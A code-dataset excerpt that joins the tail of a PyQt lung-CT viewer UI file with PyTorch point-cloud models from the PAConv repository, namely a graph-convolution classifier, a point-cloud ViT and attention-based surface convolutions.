brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.slide_show_label.setPalette(palette)
self.slide_show_label.setFrameShape(QtWidgets.QFrame.Box)
self.slide_show_label.setFrameShadow(QtWidgets.QFrame.Plain)
self.slide_show_label.setLineWidth(1)
self.slide_show_label.setText("")
self.slide_show_label.setObjectName("slide_show_label")
self.tableWidget = QtWidgets.QTableWidget(self.centralwidget)
self.tableWidget.setGeometry(QtCore.QRect(13, 630, 1211, 150))
self.tableWidget.setObjectName("tableWidget")
self.tableWidget.setColumnCount(0)
self.tableWidget.setRowCount(0)
self.sentenceWidget = QtWidgets.QTableWidget(self.centralwidget)
self.sentenceWidget.setGeometry(QtCore.QRect(13, 800, 1211, 150))
self.sentenceWidget.setObjectName("sentenceWidget")
self.sentenceWidget.setColumnCount(0)
self.sentenceWidget.setRowCount(0)
self.fileopen_progressBar = QtWidgets.QProgressBar(self.centralwidget)
self.fileopen_progressBar.setGeometry(QtCore.QRect(951, 574, 118, 23))
self.fileopen_progressBar.setProperty("value", 24)
self.fileopen_progressBar.setObjectName("fileopen_progressBar")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(674, 580, 51, 16))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(890, 580, 59, 14))
self.label_2.setObjectName("label_2")
xai_viewer.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(xai_viewer)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1240, 19))
self.menubar.setObjectName("menubar")
self.menuMenu = QtWidgets.QMenu(self.menubar)
self.menuMenu.setObjectName("menuMenu")
xai_viewer.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(xai_viewer)
self.statusbar.setObjectName("statusbar")
xai_viewer.setStatusBar(self.statusbar)
self.actionOpen = QtWidgets.QAction(xai_viewer)
self.actionOpen.setObjectName("actionOpen")
self.actionSave = QtWidgets.QAction(xai_viewer)
self.actionSave.setObjectName("actionSave")
self.menuMenu.addSeparator()
self.menuMenu.addAction(self.actionOpen)
self.menubar.addAction(self.menuMenu.menuAction())
self.retranslateUi(xai_viewer)
QtCore.QMetaObject.connectSlotsByName(xai_viewer)
def retranslateUi(self, xai_viewer):
_translate = QtCore.QCoreApplication.translate
xai_viewer.setWindowTitle(_translate("xai_viewer", "XAI LUNG CT Viewer"))
self.prev_button.setText(_translate("xai_viewer", "prev"))
self.next_button.setText(_translate("xai_viewer", "next"))
self.slide_view_label.setText(_translate("xai_viewer", "Slide View 0"))
self.nodule_list_label.setText(_translate("xai_viewer", "nodule list"))
self.file_name.setText(_translate("xai_viewer", "file name"))
self.nodule_attribute_label.setText(_translate("xai_viewer", "nodule attribute"))
self.detect_button.setText(_translate("xai_viewer", "detect"))
self.label.setText(_translate("xai_viewer", "detect:"))
self.label_2.setText(_translate("xai_viewer", "fileopen:"))
self.menuMenu.setTitle(_translate("xai_viewer", "file"))
self.actionOpen.setText(_translate("xai_viewer", "open"))
self.actionSave.setText(_translate("xai_viewer", "save folder"))
``` |
{
"source": "JiazeWang/PAConv",
"score": 2
} |
#### File: obj_cls/cuda_lib/functional.py
```python
from . import functions
def assign_score_withk_halfkernel(score, point_input, knn_idx, aggregate='sum'):
return functions.assign_score_withk_halfkernel(score, point_input, knn_idx, aggregate)
def assign_score_withk(score, point_input, center_input, knn_idx, aggregate='sum'):
return functions.assign_score_withk(score, point_input, center_input, knn_idx, aggregate)
```
#### File: obj_cls/model/model_gcn3d.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import sys
sys.path.append("../")
import gcn3d
class GCN3D(nn.Module):
def __init__(self, support_num: int, neighbor_num: int):
super().__init__()
self.neighbor_num = neighbor_num
self.conv_0 = gcn3d.Conv_surface(kernel_num= 32, support_num= support_num)
self.conv_1 = gcn3d.Conv_layer(32, 64, support_num= support_num)
self.pool_1 = gcn3d.Pool_layer(pooling_rate= 4, neighbor_num= 4)
self.conv_2 = gcn3d.Conv_layer(64, 128, support_num= support_num)
self.conv_3 = gcn3d.Conv_layer(128, 256, support_num= support_num)
self.pool_2 = gcn3d.Pool_layer(pooling_rate= 4, neighbor_num= 4)
self.conv_4 = gcn3d.Conv_layer(256, 1024, support_num= support_num)
self.bn1 = nn.BatchNorm1d(64, affine=False)
self.bn2 = nn.BatchNorm1d(128, affine=False)
self.bn3 = nn.BatchNorm1d(256, affine=False)
self.bn4 = nn.BatchNorm1d(1024, affine=False)
self.d1 = nn.Conv1d(32, 64, kernel_size=1, bias=False)
self.d2 = nn.Conv1d(64, 128, kernel_size=1, bias=False)
self.d3 = nn.Conv1d(128, 256, kernel_size=1, bias=False)
self.d4 = nn.Conv1d(256, 1024, kernel_size=1, bias=False)
self.classifier = nn.Sequential(
nn.Linear(1024, 256),
nn.Dropout(0.3),
nn.BatchNorm1d(256),
nn.ReLU(inplace= False),
nn.Linear(256, 40)
)
def forward(self, vertices: "(bs, vertice_num, 3)"):
vertices = torch.transpose(vertices, 1, 2)
bs, vertice_num, _ = vertices.size()
neighbor_index = gcn3d.get_neighbor_index(vertices, self.neighbor_num)
fm_0 = self.conv_0(neighbor_index, vertices)
fm_0 = F.relu(fm_0, inplace= False)
residual1 = torch.transpose(self.d1(torch.transpose(fm_0, 1, 2)), 1, 2)
fm_1 = self.conv_1(neighbor_index, vertices, fm_0)
fm_1 = self.bn1(fm_1.transpose(2,1)).transpose(2, 1)
fm_1 = F.relu(fm_1, inplace= False)
fm_1 += residual1
#fm_1 = F.relu(fm_1, inplace= False)
vertices, fm_1 = self.pool_1(vertices, fm_1)
neighbor_index = gcn3d.get_neighbor_index(vertices, self.neighbor_num)
residual2 = torch.transpose(self.d2(torch.transpose(fm_1, 1, 2)), 1, 2)
fm_2 = self.conv_2(neighbor_index, vertices, fm_1)
fm_2 = self.bn2(fm_2.transpose(2,1)).transpose(2, 1)
fm_2 = F.relu(fm_2, inplace= False)
fm_2 += residual2
#fm_2 = F.relu(fm_2, inplace= False)
residual3 = torch.transpose(self.d3(torch.transpose(fm_2, 1, 2)), 1, 2)
fm_3 = self.conv_3(neighbor_index, vertices, fm_2)
fm_3 = self.bn3(fm_3.transpose(2,1)).transpose(2, 1)
fm_3 = F.relu(fm_3, inplace= False)
fm_3 += residual3
#fm_3 = F.relu(fm_3, inplace= False)
vertices, fm_3 = self.pool_2(vertices, fm_3)
neighbor_index = gcn3d.get_neighbor_index(vertices, self.neighbor_num)
residual4 = torch.transpose(self.d4(torch.transpose(fm_3, 1, 2)), 1, 2)
fm_4 = self.conv_4(neighbor_index, vertices, fm_3)
fm_4 = self.bn4(fm_4.transpose(2,1)).transpose(2, 1)
fm_4 = F.relu(fm_4, inplace= False)
fm_4 += residual4
feature_global = fm_4.max(1)[0]
pred = self.classifier(feature_global)
return pred
def parameter_number(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def test():
import time
sys.path.append("..")
#from util import parameter_number
device = torch.device('cuda:0')
points = torch.zeros(8, 1024, 3).to(device)
model = GCN3D(support_num= 1, neighbor_num= 20).to(device)
start = time.time()
output = model(points)
print("Inference time: {}".format(time.time() - start))
print("Parameter #: {}".format(parameter_number(model)))
print("Inputs size: {}".format(points.size()))
print("Output size: {}".format(output.size()))
if __name__ == '__main__':
test()
```
#### File: obj_cls/model/vit.py
```python
import torch
from torch import nn
from einops import rearrange, repeat
from einops.layers.torch import Rearrange
import sys
import numpy as np
sys.path.append("../")
from lib.pointops.functions import pointops
# helpers
class Encoder(nn.Module):
def __init__(self, encoder_channel):
super().__init__()
self.encoder_channel = encoder_channel
self.first_conv = nn.Sequential(
nn.Conv1d(3, 128, 1),
nn.BatchNorm1d(128),
nn.ReLU(inplace=True),
nn.Conv1d(128, 256, 1)
)
self.second_conv = nn.Sequential(
nn.Conv1d(512, 512, 1),
nn.BatchNorm1d(512),
nn.ReLU(inplace=True),
nn.Conv1d(512, self.encoder_channel, 1)
)
def forward(self, point_groups):
'''
point_groups : B G N 3
-----------------
feature_global : B G C
'''
bs, g, n , _ = point_groups.shape
point_groups = point_groups.reshape(bs * g, n, 3)
# encoder
feature = self.first_conv(point_groups.transpose(2,1)) # BG 256 n
feature_global = torch.max(feature,dim=2,keepdim=True)[0] # BG 256 1
feature = torch.cat([feature_global.expand(-1,-1,n), feature], dim=1)# BG 512 n
feature = self.second_conv(feature) # BG 1024 n
feature_global = torch.max(feature, dim=2, keepdim=False)[0] # BG 1024
return feature_global.reshape(bs, g, self.encoder_channel)
def batched_index_select(values, indices):
last_dim = values.shape[-1]
return values.gather(1, indices[:, :, None].expand(-1, -1, last_dim))
def pair(t):
return t if isinstance(t, tuple) else (t, t)
# classes
def cluster_points(input, cluster_num = 4):
b, np, c = input.size()
lable = torch.zeros(b, np)
divide_x, index_x = torch.sort(input[:,:,0])
srt_x, rank_x = torch.sort(index_x)
divide_y, index_y = torch.sort(input[:,:,1])
srt_y, rank_y = torch.sort(index_y)
divide_z, index_z = torch.sort(input[:,:,2])
srt_z, rank_z = torch.sort(index_z)
index_x = torch.floor(rank_x/(np/cluster_num))
index_y = torch.floor(rank_y/(np/cluster_num))
index_z = torch.floor(rank_z/(np/cluster_num))
index_xyz = index_x*1+index_y*cluster_num+index_z*cluster_num*cluster_num
selet_index, index_index = torch.sort(index_xyz)
result = batched_index_select(input, index_index)
box_points = int(cluster_num*cluster_num*cluster_num)
box_num = int(np / box_points)
result = result.reshape(b, box_num, box_points * c)
return result
def sort_points(input):
b, np, c = input.size()
inputnew = input.clone()
inputnew[:,:,0] = inputnew[:,:,0]- input[:,:,0].min()
inputnew[:,:,1] = inputnew[:,:,1]- input[:,:,1].min()
inputnew[:,:,2] = inputnew[:,:,2]- input[:,:,2].min()
distance = inputnew[:,:,0] * inputnew[:,:,0] + inputnew[:,:,1] * inputnew[:,:,1]+inputnew[:,:,2] * inputnew[:,:,2]
sort_d, index_d = torch.sort(distance)
#print("index_d.shape", index_d.shape)
result = batched_index_select(input, index_d)
return result
class get_new_points(nn.Module):
def __init__(self,
num_clusters = 32,
num_neighbors = 32):
super(get_new_points, self).__init__()
self.num_clusters = num_clusters
self.num_neighbors = num_neighbors
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=True, return_xyz=True)
def forward(self, p1):
b, n, c = p1.size()
p1 = p1.contiguous()
p1_trans = p1.transpose(1, 2).contiguous() # (B, 3, N)
p2 = pointops.gathering(p1_trans, (pointops.furthestsampling(p1, self.num_clusters)).contiguous()).transpose(1, 2).contiguous()
p2 = sort_points(p2)
n_x = self.grouper(xyz=p1, new_xyz=p2).reshape(b, self.num_clusters, c * self.num_neighbors)
return n_x
class get_new_points_v2(nn.Module):
def __init__(self,
num_clusters = 32,
num_neighbors = 32):
super(get_new_points_v2, self).__init__()
self.num_clusters = num_clusters
self.num_neighbors = num_neighbors
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=True, return_xyz=True)
def forward(self, p1):
b, n, c = p1.size()
p1 = p1.contiguous()
p1_trans = p1.transpose(1, 2).contiguous() # (B, 3, N)
p2 = pointops.gathering(p1_trans, (pointops.furthestsampling(p1, self.num_clusters)).contiguous()).transpose(1, 2).contiguous()
p2 = sort_points(p2)
n_x = self.grouper(xyz=p1, new_xyz=p2)
n_x = n_x - p2.transpose(1, 2).unsqueeze(-1)
return n_x.permute(0, 2, 3, 1)
class PreNorm(nn.Module):
def __init__(self, dim, fn):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(self.norm(x), **kwargs)
class FeedForward(nn.Module):
def __init__(self, dim, hidden_dim, dropout = 0.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, hidden_dim),
nn.GELU(),
nn.Dropout(dropout),
nn.Linear(hidden_dim, dim),
nn.Dropout(dropout)
)
def forward(self, x):
return self.net(x)
class Attention(nn.Module):
def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.):
super().__init__()
inner_dim = dim_head * heads
project_out = not (heads == 1 and dim_head == dim)
self.heads = heads
self.scale = dim_head ** -0.5
self.attend = nn.Softmax(dim = -1)
self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)
self.to_out = nn.Sequential(
nn.Linear(inner_dim, dim),
nn.Dropout(dropout)
) if project_out else nn.Identity()
def forward(self, x):
qkv = self.to_qkv(x).chunk(3, dim = -1)
q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv)
dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale
attn = self.attend(dots)
out = torch.matmul(attn, v)
out = rearrange(out, 'b h n d -> b n (h d)')
return self.to_out(out)
class Transformer(nn.Module):
def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.):
super().__init__()
self.layers = nn.ModuleList([])
for _ in range(depth):
self.layers.append(nn.ModuleList([
PreNorm(dim, Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout)),
PreNorm(dim, FeedForward(dim, mlp_dim, dropout = dropout))
]))
def forward(self, x):
for attn, ff in self.layers:
x = attn(x) + x
x = ff(x) + x
return x
class ViT(nn.Module):
def __init__(self, *, patch_point_num, num_patches, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 256, dropout = 0., emb_dropout = 0.):
super().__init__()
patch_dim = channels * patch_point_num
assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)'
self.emb = nn.Linear(patch_dim, dim)
self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim))
self.cls_token = nn.Parameter(torch.randn(1, 1, dim))
self.dropout = nn.Dropout(emb_dropout)
#self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
self.Encoder = Encoder(encoder_channel = dim)
self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout)
self.pool = pool
self.to_latent = nn.Identity()
"""
self.mlp_head = nn.Sequential(
nn.LayerNorm(dim),
nn.Linear(dim, num_classes)
)
"""
self.mlp_head = nn.Sequential(
nn.LayerNorm(dim),
nn.Linear(dim, 256),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(256, num_classes)
)
self.get_new_points = get_new_points_v2(num_clusters = num_patches, num_neighbors = patch_point_num)
def forward(self, data, label=None, criterion=None):
data = data.transpose(1,2)
x = self.get_new_points(data)
#print("x.shape",x.shape)
x = self.Encoder(x)
#print("x.after_encoder",x.shape)
#x = self.emb(x)
b, n, _ = x.shape
cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b)
x = torch.cat((cls_tokens, x), dim=1)
x = x + self.pos_embedding[:, :(n + 1)]
x = self.dropout(x)
x = self.transformer(x)
x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0]
x = self.to_latent(x)
x = self.mlp_head(x)
if criterion is not None:
return x, criterion(x, label)
else:
return x
def parameter_number(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
if __name__ == '__main__':
model = ViT(patch_point_num=32, num_patches=64, num_classes=40, dim=256, depth=12, heads=6, mlp_dim=512).cuda()
print(parameter_number(model)/1000000)
points = torch.from_numpy(np.load("target.npy")).unsqueeze(0).contiguous().cuda()#.to(device)
points = points.transpose(1,2)
result = model(points)
print("final_result:", result.shape)
```
#### File: PAConv/part_seg/gcn3d_attention.py
```python
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import copy
def get_neighbor_index(vertices: "(bs, vertice_num, 3)", neighbor_num: int):
"""
Return: (bs, vertice_num, neighbor_num)
"""
bs, v, _ = vertices.size()
device = vertices.device
inner = torch.bmm(vertices, vertices.transpose(1, 2)) #(bs, v, v)
quadratic = torch.sum(vertices**2, dim= 2) #(bs, v)
distance = inner * (-2) + quadratic.unsqueeze(1) + quadratic.unsqueeze(2)
neighbor_index = torch.topk(distance, k= neighbor_num + 1, dim= -1, largest= False)[1]
neighbor_index = neighbor_index[:, :, 1:]
return neighbor_index
def get_nearest_index(target: "(bs, v1, 3)", source: "(bs, v2, 3)"):
"""
Return: (bs, v1, 1)
"""
inner = torch.bmm(target, source.transpose(1, 2)) #(bs, v1, v2)
s_norm_2 = torch.sum(source ** 2, dim= 2) #(bs, v2)
t_norm_2 = torch.sum(target ** 2, dim= 2) #(bs, v1)
d_norm_2 = s_norm_2.unsqueeze(1) + t_norm_2.unsqueeze(2) - 2 * inner
nearest_index = torch.topk(d_norm_2, k= 1, dim= -1, largest= False)[1]
return nearest_index
def indexing_neighbor(tensor: "(bs, vertice_num, dim)", index: "(bs, vertice_num, neighbor_num)" ):
"""
Return: (bs, vertice_num, neighbor_num, dim)
"""
bs, v, n = index.size()
id_0 = torch.arange(bs).view(-1, 1, 1)
tensor_indexed = tensor[id_0, index]
return tensor_indexed
def get_neighbor_direction_norm(vertices: "(bs, vertice_num, 3)", neighbor_index: "(bs, vertice_num, neighbor_num)"):
"""
Return: (bs, vertice_num, neighobr_num, 3)
"""
neighbors = indexing_neighbor(vertices, neighbor_index) # (bs, v, n, 3)
neighbor_direction = neighbors - vertices.unsqueeze(2)
neighbor_direction_norm = F.normalize(neighbor_direction, dim= -1)
return neighbor_direction_norm
class Conv_surface(nn.Module):
"""Extract structure feafure from surface, independent from vertice coordinates"""
def __init__(self, kernel_num, support_num):
super().__init__()
self.kernel_num = kernel_num
self.support_num = support_num
self.relu = nn.ReLU(inplace= True)
self.directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.support_num * self.kernel_num)
self.directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_num)",
vertices: "(bs, vertice_num, 3)"):
"""
Return vertices with local feature: (bs, vertice_num, kernel_num)
"""
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_direction_norm = F.normalize(self.directions, dim= 0) #(3, s * k)
theta = neighbor_direction_norm @ support_direction_norm # (bs, vertice_num, neighbor_num, s*k)
theta = self.relu(theta)
theta = theta.contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
theta = torch.max(theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
feature = torch.sum(theta, dim= 2) # (bs, vertice_num, kernel_num)
return feature
def clones(module, N):
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
# simple self attention and simple RPE in PointFormer
# position_embedding (b,n,n)
# query / key / value (b,h,n,d)
def attention(query, key, value, mask=None, dropout=None, position_embedding=None):
d_k = query.size(-1)
# scores (b,h,n,n)
scores = torch.matmul(query, key.transpose(-2, -1).contiguous()) / math.sqrt(d_k)
if mask is not None:
scores = scores.masked_fill(mask == 0, -1e9)
if position_embedding is not None:
position_embedding = position_embedding.unsqueeze(1)
scores = scores + position_embedding
p_attn = F.softmax(scores, dim=-1)
return torch.matmul(p_attn, value), p_attn
class MultiHeadedAttention(nn.Module):
def __init__(self, h, d_model, fn_attention=attention, dropout=0.1):
"Take in model size and number of heads."
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_model = d_model
self.d_k = d_model // h
self.h = h
self.linears = clones(nn.Linear(d_model, d_model), 4)
self.fn_attention = fn_attention
self.attn = None
self.dropout = None
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.d_model * self.d_model)
for linear in self.linears:
linear.weight.data.uniform_(-stdv, stdv)
def forward(self, query, key, value):
nbatches = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = \
[l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2).contiguous()
for l, x in zip(self.linears, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
#x, self.attn = attention(query, key, value, mask=mask,
# dropout=self.dropout, position_embedding=position_embedding)
x, self.attn = self.fn_attention(query, key, value, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous() \
.view(nbatches, -1, self.h * self.d_k)
return self.linears[-1](x)
class Attention_Conv_surface(nn.Module):
def __init__(self, kernel_num, support_num):
super().__init__()
self.kernel_num = kernel_num
self.support_num = support_num
self.relu = nn.ReLU(inplace= True)
self.query_directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.value_directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.key_directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.multihead_attention = MultiHeadedAttention(4, kernel_num, fn_attention=attention)
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.support_num * self.kernel_num)
self.query_directions.data.uniform_(-stdv, stdv)
self.value_directions.data.uniform_(-stdv, stdv)
self.key_directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_num)",
vertices: "(bs, vertice_num, 3)"):
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
support_query_direction_norm = F.normalize(self.query_directions, dim= 0) #(3, s * k)
support_key_direction_norm = F.normalize(self.key_directions, dim= 0) #(3, s * k)
support_value_direction_norm = F.normalize(self.value_directions, dim= 0) #(3, s * k)
query_theta = neighbor_direction_norm @ support_query_direction_norm # (bs, vertice_num, neighbor_num, s*k)
query_theta = self.relu(query_theta)
query_theta = query_theta.contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
query_theta = torch.max(query_theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
query_theta = torch.sum(query_theta, dim= 2) # (bs, vertice_num, kernel_num)
key_theta = neighbor_direction_norm @ support_key_direction_norm # (bs, vertice_num, neighbor_num, s*k)
key_theta = self.relu(key_theta)
key_theta = key_theta.contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
key_theta = torch.max(key_theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
key_theta = torch.sum(key_theta, dim= 2) # (bs, vertice_num, kernel_num)
value_theta = neighbor_direction_norm @ support_value_direction_norm # (bs, vertice_num, neighbor_num, s*k)
value_theta = self.relu(value_theta)
value_theta = value_theta.contiguous().view(bs, vertice_num, neighbor_num, self.support_num, self.kernel_num)
value_theta = torch.max(value_theta, dim= 2)[0] # (bs, vertice_num, support_num, kernel_num)
value_theta = torch.sum(value_theta, dim= 2) # (bs, vertice_num, kernel_num)
feature = self.multihead_attention(query_theta, key_theta, value_theta)
return feature
class Attention_Conv_surface2(nn.Module):
def __init__(self, kernel_num, support_num):
super().__init__()
self.kernel_num = kernel_num
self.support_num = support_num
self.relu = nn.ReLU(inplace= True)
self.directions = nn.Parameter(torch.FloatTensor(3, support_num * kernel_num))
self.multihead_attention = MultiHeadedAttention(4, kernel_num, fn_attention=attention)
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.support_num * self.kernel_num)
self.directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_num)",
